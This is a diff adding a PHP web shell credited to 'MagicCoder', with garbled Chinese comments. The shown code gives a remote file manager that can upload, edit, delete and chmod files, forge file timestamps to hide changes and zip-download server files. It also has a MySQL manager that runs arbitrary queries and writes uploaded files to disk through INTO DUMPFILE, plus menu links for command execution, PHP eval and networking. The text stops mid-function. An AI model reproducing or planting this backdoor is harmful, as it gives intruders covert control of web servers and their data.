+.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
+.head td span{font-weight:normal;}
+form{margin:0;padding:0;}
+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
+ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
+u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
+</style>
+<script type="text/javascript">
+function CheckAll(form) {
+	for(var i=0;i<form.elements.length;i++) {
+		var e = form.elements[i];
+		if (e.name != 'chkall')
+		e.checked = form.chkall.checked;
+    }
+}
+function $(id) {
+	return document.getElementById(id);
+}
+function goaction(act){
+	$('goaction').action.value=act;
+	$('goaction').submit();
+}
+</script>
+</head>
+<body style="margin:0;table-layout:fixed; word-break:break-all">
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	<tr class="head">
+		<td><span style="float:right;"><a href="http://www.magiccoder.ir" target="_blank">MagicCoder</a></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
+	</tr>
+	<tr class="alt1">
+		<td><span style="float:right;">Safe Mode:<?php echo getcfg('safe_mode');?></span>			
+			<?php if($admin['check'] != false){echo "<a href=\"javascript:goaction('logout');\">Logout</a> |";}else{}?> 
+			<a href="javascript:goaction('file');">File Manager</a> | 
+			<a href="javascript:goaction('sqladmin');">MySQL Manager</a> | 
+			<a href="javascript:goaction('sqlfile');">MySQL Upload &amp; Download</a> | 
+			<?php if(getcfg('safe_mode') == 'Yes'){echo 'Execute Command (Safe Mode is On ) |';}else{ echo "<a href=\"javascript:goaction('shell');\">Execute Command</a> |";} ?>
+			<a href="javascript:goaction('phpenv');">PHP Variable</a> | 
+			<a href="javascript:goaction('eval');">Eval PHP Code</a> |			<?php if(getcfg('safe_mode') == 'Yes'){echo 'NET (Safe Mode is On )';}elseif(IS_WIN){echo 'NET (Os is a Windows)';}else{ echo "<a href=\"javascript:goaction('net');\">NET</a>";} ?>
+		</td>
+	</tr>
+</table>
+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
+<?php
+
+formhead(array('name'=>'goaction'));
+makehide('action');
+formfoot();
+
+$errmsg && m($errmsg);
+
+// »ñÈ¡µ±Ç°Â·¾¶
+!$dir && $dir = '.';
+$nowpath = getPath(SA_ROOT, $dir);
+if (substr($dir, -1) != '/') {
+	$dir = $dir.'/';
+}
+$uedir = ue($dir);
+
+if (!$action || $action == 'file') {
+
+	// Å�¶�¶��´Çé¿ö
+	$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
+
+	// ɾ³ýÃâ€Ã‚¿Ã‚¼
+	if ($doing == 'deldir' && $thefile) {
+		if (!file_exists($thefile)) {
+			m($thefile.' directory does not exist');
+		} else {
+			m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
+		}
+	}
+
+	// ´´½¨Ãâ€Ã‚¿Ã‚¼
+	elseif ($newdirname) {
+		$mkdirs = $nowpath.$newdirname;
+		if (file_exists($mkdirs)) {
+			m('Directory has already existed');
+		} else {
+			m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
+			@chmod($mkdirs,0777);
+		}
+	}
+
+	// ÉÃ�´«ÎÃâ€Ã‚¼Ã¾
+	elseif ($doupfile) {
+		m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
+	}
+
+	// ±à¼¼þ
+	elseif ($editfilename && $filecontent) {
+		$fp = @fopen($editfilename,'w');
+		m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
+		@fclose($fp);
+	}
+
+	// ±à¼¼þÊôÃ�Ãâ€
+	elseif ($pfile && $newperm) {
+		if (!file_exists($pfile)) {
+			m('The original file does not exist');
+		} else {
+			$newperm = base_convert($newperm,8,10);
+			m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
+		}
+	}
+
+	// ¸Ãâ€ÃƒÆ’û
+	elseif ($oldname && $newfilename) {
+		$nname = $nowpath.$newfilename;
+		if (file_exists($nname) || !file_exists($oldname)) {
+			m($nname.' has already existed or original file does not exist');
+		} else {
+			m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
+		}
+	}
+
+	// ¸´ÖÆÎÃâ€Ã‚¼Ã¾
+	elseif ($sname && $tofile) {
+		if (file_exists($tofile) || !file_exists($sname)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
+		}
+	}
+
+	// ¿Ë¡ʱ¼ä
+	elseif ($curfile && $tarfile) {
+		if (!@file_exists($curfile) || !@file_exists($tarfile)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			$time = @filemtime($tarfile);
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// ×Ãâ€Ã‚¶Â¨Ã’åʱ¼ä
+	elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
+		if (!@file_exists($curfile)) {
+			m(basename($curfile).' does not exist');
+		} else {
+			$time = strtotime("$year-$month-$day $hour:$minute:$second");
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// ´ò°üÃ�ÂÃâ€ÃƒËœ
+	elseif($doing == 'downrar') {
+		if ($dl) {
+			$dfiles='';
+			foreach ($dl as $filepath => $value) {
+				$dfiles.=$filepath.',';
+			}
+			$dfiles=substr($dfiles,0,strlen($dfiles)-1);
+			$dl=explode(',',$dfiles);
+			$zip=new PHPZip($dl);
+			$code=$zip->out;
+			header('Content-type: application/octet-stream');
+			header('Accept-Ranges: bytes');
+			header('Accept-Length: '.strlen($code));
+			header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
+			echo $code;
+			exit;
+		} else {
+			m('Please select file(s)');
+		}
+	}
+
+	// ÅúÃ�¿É¾³ýÎÃâ€Ã‚¼Ã¾
+	elseif($doing == 'delfiles') {
+		if ($dl) {
+			$dfiles='';
+			$succ = $fail = 0;
+			foreach ($dl as $filepath => $value) {
+				if (@unlink($filepath)) {
+					$succ++;
+				} else {
+					$fail++;
+				}
+			}
+			m('Deleted file have finished£¬choose '.count($dl).' success '.$succ.' fail '.$fail);
+		} else {
+			m('Please select file(s)');
+		}
+	}
+
+	//²Ù×÷�ê±�
+	formhead(array('name'=>'createdir'));
+	makehide('newdirname');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileperm'));
+	makehide('newperm');
+	makehide('pfile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'copyfile'));
+	makehide('sname');
+	makehide('tofile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'rename'));
+	makehide('oldname');
+	makehide('newfilename');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileopform'));
+	makehide('action');
+	makehide('opfile');
+	makehide('dir');
+	formfoot();
+
+	$free = @disk_free_space($nowpath);
+	!$free && $free = 0;
+	$all = @disk_total_space($nowpath);
+	!$all && $all = 0;
+	$used = $all-$free;
+	$used_percent = @round(100/($all/$free),2);
+	p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)</h2>');
+
+?>
+<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
+  <form action="" method="post" id="godir" name="godir">
+  <tr>
+    <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
+	<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
+    <td nowrap><input class="bt" value="GO" type="submit"></td>
+  </tr>
+  </form>
+</table>
+<script type="text/javascript">
+function createdir(){
+	var newdirname;
+	newdirname = prompt('Please input the directory name:', '');
+	if (!newdirname) return;
+	$('createdir').newdirname.value=newdirname;
+	$('createdir').submit();
+}
+function fileperm(pfile){
+	var newperm;
+	newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
+	if (!newperm) return;
+	$('fileperm').newperm.value=newperm;
+	$('fileperm').pfile.value=pfile;
+	$('fileperm').submit();
+}
+function copyfile(sname){
+	var tofile;
+	tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
+	if (!tofile) return;
+	$('copyfile').tofile.value=tofile;
+	$('copyfile').sname.value=sname;
+	$('copyfile').submit();
+}
+function rename(oldname){
+	var newfilename;
+	newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
+	if (!newfilename) return;
+	$('rename').newfilename.value=newfilename;
+	$('rename').oldname.value=oldname;
+	$('rename').submit();
+}
+function dofile(doing,thefile,m){
+	if (m && !confirm(m)) {
+		return;
+	}
+	$('filelist').doing.value=doing;
+	if (thefile){
+		$('filelist').thefile.value=thefile;
+	}
+	$('filelist').submit();
+}
+function createfile(nowpath){
+	var filename;
+	filename = prompt('Please input the file name:', '');
+	if (!filename) return;
+	opfile('editfile',nowpath + filename,nowpath);
+}
+function opfile(action,opfile,dir){
+	$('fileopform').action.value=action;
+	$('fileopform').opfile.value=opfile;
+	$('fileopform').dir.value=dir;
+	$('fileopform').submit();
+}
+function godir(dir,view_writable){
+	if (view_writable) {
+		$('godir').view_writable.value=1;
+	}
+	$('godir').dir.value=dir;
+	$('godir').submit();
+}
+</script>
+  <?php
+	tbhead();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
+	p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
+	p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
+	if ($view_writable) {
+		p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
+	} else {
+		p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
+	}
+	p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
+	if (IS_WIN && IS_COM) {
+		$obj = new COM('scripting.filesystemobject');
+		if ($obj && is_object($obj)) {
+			$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
+			foreach($obj->Drives as $drive) {
+				if ($drive->DriveType == 2) {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'&#13;Free:'.sizecount($drive->FreeSpace).'&#13;Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				} else {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				}
+			}
+		}
+	}
+
+	p('</td></tr></form>');
+
+	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+
+	//²é¿´ËùÓÃ�¿ÉÃ�´ÎÃâ€Ã‚¼Ã¾ÂºÃ�Ãâ€Ã‚¿Ã‚¼
+	$dirdata=array();
+	$filedata=array();
+
+	if ($view_writable) {
+		$dirdata = GetList($nowpath);
+	} else {
+		// Ãâ€Ã‚¿Ã‚¼Ã�Ã�±í
+		$dirs=@opendir($dir);
+		while ($file=@readdir($dirs)) {
+			$filepath=$nowpath.$file;
+			if(@is_dir($filepath)){
+				$dirdb['filename']=$file;
+				$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$dirdb['dirchmod']=getChmod($filepath);
+				$dirdb['dirperm']=getPerms($filepath);
+				$dirdb['fileowner']=getUser($filepath);
+				$dirdb['dirlink']=$nowpath;
+				$dirdb['server_link']=$filepath;
+				$dirdb['client_link']=ue($filepath);
+				$dirdata[]=$dirdb;
+			} else {		
+				$filedb['filename']=$file;
+				$filedb['size']=sizecount(@filesize($filepath));
+				$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$filedb['filechmod']=getChmod($filepath);
+				$filedb['fileperm']=getPerms($filepath);
+				$filedb['fileowner']=getUser($filepath);
+				$filedb['dirlink']=$nowpath;
+				$filedb['server_link']=$filepath;
+				$filedb['client_link']=ue($filepath);
+				$filedata[]=$filedb;
+			}
+		}// while
+		unset($dirdb);
+		unset($filedb);
+		@closedir($dirs);
+	}
+	@sort($dirdata);
+	@sort($filedata);
+	$dir_i = '0';
+	foreach($dirdata as $key => $dirdb){
+		if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
+			p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
+			p('<td nowrap>'.$dirdb['mtime'].'</td>');
+			p('<td nowrap>--</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
+			p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
+			p('</tr>');
+			$dir_i++;
+		} else {
+			if($dirdb['filename']=='..') {
+				p('<tr class='.bg().'>');
+				p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
+				p('</tr>');
+			}
+		}
+	}
+
+	p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
+	p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
+	makehide('action','file');
+	makehide('thefile');
+	makehide('doing');
+	makehide('dir',$nowpath);
+	$file_i = '0';
+	foreach($filedata as $key => $filedb){
+		if($filedb['filename']!='..' && $filedb['filename']!='.') {
+			$fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
+			p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
+			p('<td nowrap>'.$filedb['mtime'].'</td>');
+			p('<td nowrap>'.$filedb['size'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
+			p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
+			p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
+			p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
+			p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
+			p('</td></tr>');
+			$file_i++;
+		}
+	}
+	p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
+	p('</form></table>');
+}// end dir
+
+elseif ($action == 'sqlfile') {
+	if($doing=="mysqlupload"){
+		$file = $_FILES['uploadfile'];
+		$filename = $file['tmp_name'];
+		if (file_exists($savepath)) {
+			m('The goal file has already existed');
+		} else {
+			if(!$filename) {
+				m('Please choose a file');
+			} else {
+				$fp=@fopen($filename,'r');
+				$contents=@fread($fp, filesize($filename));
+				@fclose($fp);
+				$contents = bin2hex($contents);
+				if(!$upname) $upname = $file['name'];
+				dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+				$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
+				m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
+			}
+		}
+	}
+?>
+<script type="text/javascript">
+function mysqlfile(doing){
+	if(!doing) return;
+	$('doing').value=doing;
+	$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
+	$('mysqlfile').dbport.value=$('dbinfo').dbport.value;
+	$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
+	$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
+	$('mysqlfile').dbname.value=$('dbinfo').dbname.value;
+	$('mysqlfile').charset.value=$('dbinfo').charset.value;
+	$('mysqlfile').submit();
+}
+</script>
+<?php
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
+	formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
+	makehide('action','sqlfile');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBName:');
+	makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
+	p('</p>');
+	formfoot();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
+	p('<h2>Upload file</h2>');
+	p('<p><b>This operation the DB user must has FILE privilege</b></p>');
+	p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
+	p('<h2>Download file</h2>');
+	p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
+	makehide('dbhost');
+	makehide('dbport');
+	makehide('dbuser');
+	makehide('dbpass');
+	makehide('dbname');
+	makehide('charset');
+	makehide('doing');
+	makehide('action','sqlfile');
+	p('</form>');
+}
+
+elseif ($action == 'sqladmin') {
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
+	if(isset($dbhost)){
+		$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
+	}
+	if(isset($dbuser)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
+	}
+	if(isset($dbpass)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
+	}
+	if(isset($dbport)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
+	}
+	if(isset($dbname)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
+	}
+	if(isset($charset)) {
+		$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
+	}
+
+	if ($doing == 'backupmysql' && $saveasfile) {
+		if (!$table) {
+			m('Please choose the table');
+		} else {
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			$table = array_flip($table);
+			$fp = @fopen($path,'w');
+			if ($fp) {
+				$result = q('SHOW tables');
+				if (!$result) p('<h2>'.mysql_error().'</h2>');
+				$mysqldata = '';
+				while ($currow = mysql_fetch_array($result)) {
+					if (isset($table[$currow[0]])) {
+						sqldumptable($currow[0], $fp);
+					}
+				}
+				fclose($fp);
+				$fileurl = str_replace(SA_ROOT,'',$path);
+				m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
+				mysql_close();
+			} else {
+				m('Backup failed');
+			}
+		}
+	}
+	if ($insert && $insertsql) {
+		$keystr = $valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			if ($val) {
+				$keystr .= $tmp.$key;
+				$valstr .= $tmp."'".addslashes($val)."'";
+				$tmp = ',';
+			}
+		}
+		if ($keystr && $valstr) {
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
+		}
+	}
+	if ($update && $insertsql && $base64) {
+		$valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			$valstr .= $tmp.$key."='".addslashes($val)."'";
+			$tmp = ',';
+		}
+		if ($valstr) {
+			$where = base64_decode($base64);
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
+		}
+	}
+	if ($doing == 'del' && $base64) {
+		$where = base64_decode($base64);
+		$delete_sql = "DELETE FROM $tablename WHERE $where";
+		dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
+	}
+
+	if ($tablename && $doing == 'drop') {
+		dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		if (q("DROP TABLE $tablename")) {
+			m('Drop table of success');
+			$tablename = '';
+		} else {
+			m(mysql_error());
+		}
+	}
+
+	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
+
+	formhead(array('title'=>'MYSQL Manager'));
+	makehide('action','sqladmin');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
+	makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+?>
+<script type="text/javascript">
+function editrecord(action, base64, tablename){
+	if (action == 'del') {		
+		if (!confirm('Is or isn\'t deletion record?')) return;
+	}
+	$('recordlist').doing.value=action;
+	$('recordlist').base64.value=base64;
+	$('recordlist').tablename.value=tablename;
+	$('recordlist').submit();
+}
+function moddbname(dbname) {
+	if(!dbname) return;
+	$('setdbname').dbname.value=dbname;
+	$('setdbname').submit();
+}
+function settable(tablename,doing,page) {
+	if(!tablename) return;
+	if (doing) {
+		$('settable').doing.value=doing;
+	}
+	if (page) {
+		$('settable').page.value=page;
+	}
+	$('settable').tablename.value=tablename;
+	$('settable').submit();
+}
+</script>
+<?php
+	//²Ù×÷¼Ç¼
+	formhead(array('name'=>'recordlist'));
+	makehide('doing');
+	makehide('action','sqladmin');
+	makehide('base64');
+	makehide('tablename');
+	p($dbform);
+	formfoot();
+
+	//Ñ¡¶¨Êý¾�¿â
+	formhead(array('name'=>'setdbname'));
+	makehide('action','sqladmin');
+	p($dbform);
+	if (!$dbname) {
+		makehide('dbname');
+	}
+	formfoot();
+
+	//Ñ¡¶¨±í
+	formhead(array('name'=>'settable'));
+	makehide('action','sqladmin');
+	p($dbform);
+	makehide('tablename');
+	makehide('page',$page);
+	makehide('doing');
+	formfoot();
+
+	$cachetables = array();	
+	$pagenum = 30;
+	$page = intval($page);
+	if($page) {
+		$start_limit = ($page - 1) * $pagenum;
+	} else {
+		$start_limit = 0;
+		$page = 1;
+	}
+	if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
+		dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		//»ñÈ¡Êý¾�¿â�Å�¢
+		$mysqlver = mysql_get_server_info();
+		p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
+		$highver = $mysqlver > '4.1' ? 1 : 0;
+
+		//»ñÈ¡Êý¾�¿â
+		$query = q("SHOW DATABASES");
+		$dbs = array();
+		$dbs[] = '-- Select a database --';
+		while($db = mysql_fetch_array($query)) {
+			$dbs[$db['Database']] = $db['Database'];
+		}
+		makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
+		
+		$tabledb = array();
+		if ($dbname) {
+			p('<p>');
+			p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
+			if ($tablename) {
+				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
+			}
+			p('</p>');
+			mysql_select_db($dbname);
+
+			$getnumsql = '';
+			$runquery = 0;
+			if ($sql_query) {
+				$runquery = 1;
+			}
+			$allowedit = 0;
+			if ($tablename && !$sql_query) {
+				$sql_query = "SELECT * FROM $tablename";
+				$getnumsql = $sql_query;
+				$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
+				$allowedit = 1;
+			}
+			p('<form action="'.$self.'" method="POST">');
+			p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
+			makehide('tablename', $tablename);
+			makehide('action','sqladmin');
+			p($dbform);
+			p('</form>');
+			if ($tablename || ($runquery && $sql_query)) {
+				if ($doing == 'structure') {
+					$result = q("SHOW COLUMNS FROM $tablename");
+					$rowdb = array();
+					while($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					p('<tr class="head">');
+					p('<td>Field</td>');
+					p('<td>Type</td>');
+					p('<td>Null</td>');
+					p('<td>Key</td>');
+					p('<td>Default</td>');
+					p('<td>Extra</td>');
+					p('</tr>');
+					foreach ($rowdb as $row) {
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td>'.$row['Field'].'</td>');
+						p('<td>'.$row['Type'].'</td>');
+						p('<td>'.$row['Null'].'&nbsp;</td>');
+						p('<td>'.$row['Key'].'&nbsp;</td>');
+						p('<td>'.$row['Default'].'&nbsp;</td>');
+						p('<td>'.$row['Extra'].'&nbsp;</td>');
+						p('</tr>');
+					}
+					tbfoot();
+				} elseif ($doing == 'insert' || $doing == 'edit') {
+					$result = q('SHOW COLUMNS FROM '.$tablename);
+					while ($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					$rs = array();
+					if ($doing == 'insert') {
+						p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
+					} else {
+						p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
+						$where = base64_decode($base64);
+						$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
+						$rs = mysql_fetch_array($result);
+					}
+					p('<form method="post" action="'.$self.'">');
+					p($dbform);
+					makehide('action','sqladmin');
+					makehide('tablename',$tablename);
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					foreach ($rowdb as $row) {
+						if ($rs[$row['Field']]) {
+							$value = htmlspecialchars($rs[$row['Field']]);
+						} else {
+							$value = '';
+						}
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
+					}
+					if ($doing == 'insert') {
